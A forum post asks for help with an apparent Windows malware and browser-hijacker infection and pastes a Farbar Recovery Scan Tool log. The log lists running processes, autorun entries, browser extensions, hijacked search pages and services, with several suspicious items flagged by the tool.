
I THINK I'M INFECTED REAL BAD.



Good day. Of recent, after restarting my PC, I noticed I cannot open my Chrome browsers, and I started getting lots of ad pop-ups from my Internet Explorer even when it's closed.

I usually use Malwarebytes to scan my PC, but unfortunately it refuses to open. I keep getting this error message: "Windows cannot access the specific device, path, or file. You may not have the appropriate permissions to access the item." The same happens when I try opening Windows Defender.

After fruitless efforts to solve it, I came across this forum.

 

I downloaded Malwarebytes as instructed and still get the same error response.

I have done the scan with FRST, and attached are Addition.txt and FRST.txt respectively.

Addition.txt

FRST.txt


FRST.TXT

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 10.02.2019 01
Ran by #Strazzo.RoseGold## (administrator) on STRAZZOWEEZY (12-02-2019 07:09:07)
Running from C:\Users\Stanley\Downloads\FRST
Loaded Profiles: #Strazzo.RoseGold## (Available Profiles: #Strazzo.RoseGold## & RoseGold & Administrator)
Platform: Windows 8.1 Enterprise (Update) (X64) Language: English (United States)
Default browser: IE
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(LSI Corporation) C:\Program Files\LSI SoftModem\agr64svc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HPHotkeyMonitor.exe
(HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
(Iskysoft) C:\Program Files (x86)\iSkysoft\IAF\2.4.2.223\IsAppService.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
( ) C:\Program Files\OpenVPN\bin\openvpnserv2.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpnserv.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe
(The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe
(Microsoft Corporation) C:\Windows\System32\StikyNot.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe
(BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe
(Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe
(Apple, Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\secd.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler64.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
() C:\Windows\windefender.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16.0.3327.1048_x64__8wekyb3d8bbwe\onenoteim.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Internet Download Manager, Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\idmBroker.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [53535296 2019-02-02] (Skype Software Sarl -> Skype Technologies S.A.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [OPENVPN-GUI] => C:\Program Files\OpenVPN\bin\openvpn-gui.exe [672384 2018-04-26] (OpenVPN Technologies, Inc. -> )
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [utweb] => C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe [5216440 2018-04-24] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [uTorrent] => C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe [1908920 2019-01-17] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3907152 2015-07-07] (Tonec Inc. -> Tonec Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [IncrediMail] => C:\Program Files (x86)\IncrediMail\bin\IncMail.exe [444352 2018-06-10] (IncrediMail Inc. -> IncrediMail Ltd.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RIMDeviceManager] => C:\Program Files (x86)\Common Files\Research In Motion\RIMDeviceManager\RIMDeviceManager.exe [2471672 2015-05-20] (BlackBerry Ltd. -> Research In Motion Limited)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [AppleIEDAV] => C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe [68408 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [110392 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [67896 2019-01-15] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudPhotos] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe [356664 2018-12-03] (Apple Inc. -> Apple Inc.)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [479744 2014-11-22] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [WitheredHill] => C:\Windows\rss\csrss.exe [4521472 2019-02-08] () <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [CloudNet] => C:\Users\Stanley\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-02-12] (EpicNet Inc.) <==== ATTENTION
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {2c5e9d22-76c0-11e8-825e-402cf4d8539a} - "C:\Windows\system32\RunDLL32.EXE" Shell32.DLL,ShellExec_RunDLL E:\start.exe
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0bf7-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0c50-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0d35-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" 
HKU\S-1-5-18\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-18\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoResolveSearch] 1
HKU\S-1-5-18\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\...\Drivers32-x32: [msacm.iac2] => C:\Windows\SysWOW64\iac25_32.ax [197632 2013-08-22] (Intel Corporation)
HKLM\...\Drivers32-x32: [VIDC.GEOS] => C:\Windows\SysWOW64\GeoCodecD.dll [622592 2010-10-11] (GeoVision)
HKLM\Software\Microsoft\Active Setup\Installed Components: [OpenVPN_UserSetup] -> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OPENVPN-GUI /t REG_SZ /d "C:\Program Files\OpenVPN\bin\openvpn-gui.exe" /f
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\71.0.3578.98\Installer\chrmstp.exe [2018-12-18] (Google Inc -> Google Inc.)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> 
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{25D62E88-57F7-4879-91B3-0FBE5C8B4F71}: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{8BF038DF-16AA-4203-90BE-740E3461F3D4}: [DhcpNameServer] 192.168.8.1
Tcpip\..\Interfaces\{D14C4B82-5B48-498C-8F6E-81ADA12C1C8C}: [DhcpNameServer] 172.20.10.1
Tcpip\..\Interfaces\{D433F076-2F7D-4301-BE73-E8CE381871C0}: [DhcpNameServer] 192.168.8.1

Internet Explorer:
==================
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eouPPD3a3O4qGVi5Es4iIR24Y7nh9akfPai5Q1OuzbONZLJRZFaqq_kxQ9Z-DCo_GGN5rXIyO8FSvytDaIXTrMcfHrh750Q&q={searchTerms}
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGt0L7glATSfZxkIT3ysIwavywkdGdDMHHXXnjO9tg0XD9yKBCtOvz1LL_ReIEmCN-xJHRo9pam60eoicpfV_MriSUAQnsKvLWIZ4S1YS7CQyd2I9U6z0Wmnkj5s8T6U3A_ZCShl9ETmnnVUnHlDWcYqc1HesPtQHGIzTqr4X-kp
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKLM-x32 -> DefaultScope value is missing
SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms}
SearchScopes: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://yandex.ru/search/?win=331&clid=2100768&text={searchTerms}
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
IE Session Restore: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> is enabled.

FireFox:
========
FF ProfilePath: C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default [2019-02-10]
FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.HP
FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT
FF Extension: (Google Code Correction) - C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\features\{5b8c6255-56bd-4974-a055-17773a870acc}\google-code-correction@mozilla.org.xpi [2018-05-21] [Legacy]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7
FF Extension: (IDM integration) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 [2018-09-23] [Legacy] [not signed]
FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 [2019-02-12] [Legacy] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-19] ()
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-19] ()
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll [2015-05-22] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.)

Chrome: 
=======
CHR DefaultProfile: Profile 3
CHR Session Restore: Profile 3 -> is enabled.
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default [2019-02-08]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2018-06-15]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-11-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-12]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-11-08]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-02-08]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-05-04]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-05-04]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-23]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-05-04]
CHR Extension: (Serpdigger - 1st Email Extractor) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\clpkfpkkbjjplgkblpjkkfddbbkipokl [2019-01-22]
CHR Extension: (Яндекс) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-05-04]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-05-04]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-01-10]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-05-04]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-05-04]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-22]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2 [2019-02-08]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-27]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Яндекс) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-25]
CHR Extension: (Hunter: Find email addresses in seconds) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\hgmhmanijnjhaffoampdlllchpolkdnj [2019-01-30]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-16]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-01-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-22]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3 [2019-02-08]
CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-06-07]
CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\aohghmighlieiainnegkcijnfilokake [2018-06-07]
CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-06-07]
CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-06-07]
CHR Extension: (Яндекс) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\cncgohepihcekklokhbhiblhfcmipbdh [2018-06-07]
CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-06-07]
CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10]
CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-01-10]
CHR Extension: (Bazz Search SafeFinder) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2019-02-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-07]
CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2018-06-07]
CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 3\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-01-22]
CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile [2019-02-08]
CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]
CHR HKLM-x32\...\Chrome\Extension: [cncgohepihcekklokhbhiblhfcmipbdh] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2015-07-10]

Opera: 
=======
OPR StartupUrls: "hxxp://www.yandex.ru/?win=331&clid=2100767"
OPR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Roaming\Opera Software\Opera Stable\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AgereModemAudio; C:\Program Files\LSI SoftModem\agr64svc.exe [42096 2015-08-05] (Avago Technologies U.S. Inc. -> LSI Corporation)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2004-07-15] (Microsoft Corporation) [File not signed]
R3 BlackBerry Device Manager; C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe [588024 2014-10-31] (BlackBerry Ltd. -> BlackBerry Limited)
S3 CommuniGate Pro Messaging Server; C:\Windows\CommuniGatePro\CGStarter.exe [38552 2017-02-14] (CommuniGate Systems -> )
R2 hpHotkeyMonitor; C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\hpHotkeyMonitor.exe [684624 2015-06-23] (Hewlett-Packard -> Hewlett-Packard Company)
S3 hpqcaslwmiex; C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [1031704 2016-06-03] (Hewlett-Packard Company -> HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [347512 2018-12-06] (HP Inc. -> HP Inc.)
R2 HPWMISVC; C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe [606224 2016-04-19] (Hewlett-Packard Company -> HP Inc.)
R2 IsAppService; C:\Program Files (x86)\Iskysoft\IAF\2.4.2.223\IsAppService.exe [473352 2017-03-30] (Shenzhen Yi Xing Investment Co., Ltd. -> Iskysoft)
R2 OpenVPNService; C:\Program Files\OpenVPN\bin\openvpnserv2.exe [24192 2018-03-06] (OpenVPN Technologies, Inc. ->  )
R2 OpenVPNServiceInteractive; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R2 OpenVPNServiceLegacy; C:\Program Files\OpenVPN\bin\openvpnserv.exe [75392 2018-04-26] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R2 RIM MDNS; C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe [396024 2015-05-26] (BlackBerry Ltd. -> Apple Inc.)
